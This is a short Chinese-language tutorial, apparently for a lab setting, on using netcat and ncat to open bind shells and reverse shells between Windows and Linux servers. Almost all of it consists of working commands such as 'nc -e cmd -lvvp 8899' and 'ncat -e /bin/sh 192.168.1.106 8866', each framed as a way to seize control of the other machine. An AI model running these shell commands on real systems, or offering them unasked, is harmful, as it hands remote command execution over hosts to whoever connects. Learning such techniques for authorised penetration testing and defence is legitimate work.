一、正向连接，Linux服务器主动控制windows服务器

1、上传nc到windows服务器上运行

2、以管理员身份运行cmd

3、执行下面命令，监听任意来自8899端口的数据，等待服务器来连接

nc -e cmd -lvvp 8899

4、Linux服务器执行如下命令，ip地址为windows服务器的地址

ncat 192.168.1.188 8899

5、whoami查看当前主机名称，已获取windows服务器权限

6、此时windows服务器也会获取相关信息

二、正向连接，windows服务器主动控制Linux服务器

1、Linux服务器运行下面命令绑定端口

ncat -e /bin/sh -lvvp 8899

2、windows服务器去连接Linux服务器,

nc 192.168.1.108 8899

3、成功执行Linux相关命令，说明已经可控制Linux服务器

三、反向连接，windows服务器控制Linux服务器

1、windows服务器监听8866端口

nc.exe -lvvp 8866

2、Linux服务器主动连接windows服务器ip和端口

ncat -e /bin/sh 192.168.1.106 8866

3、windows服务器上执行ifconfig命令，成功获取Linux服务器相关信息

四、反向连接，Linux服务器控制服务器windows

1、Linux服务器开启端口监听

ncat -lvvp 8899

2、windows服务器主动连接Linux服务器

nc.exe -e cmd 192.168.1.108 8899

3、Linux服务器直接获取权限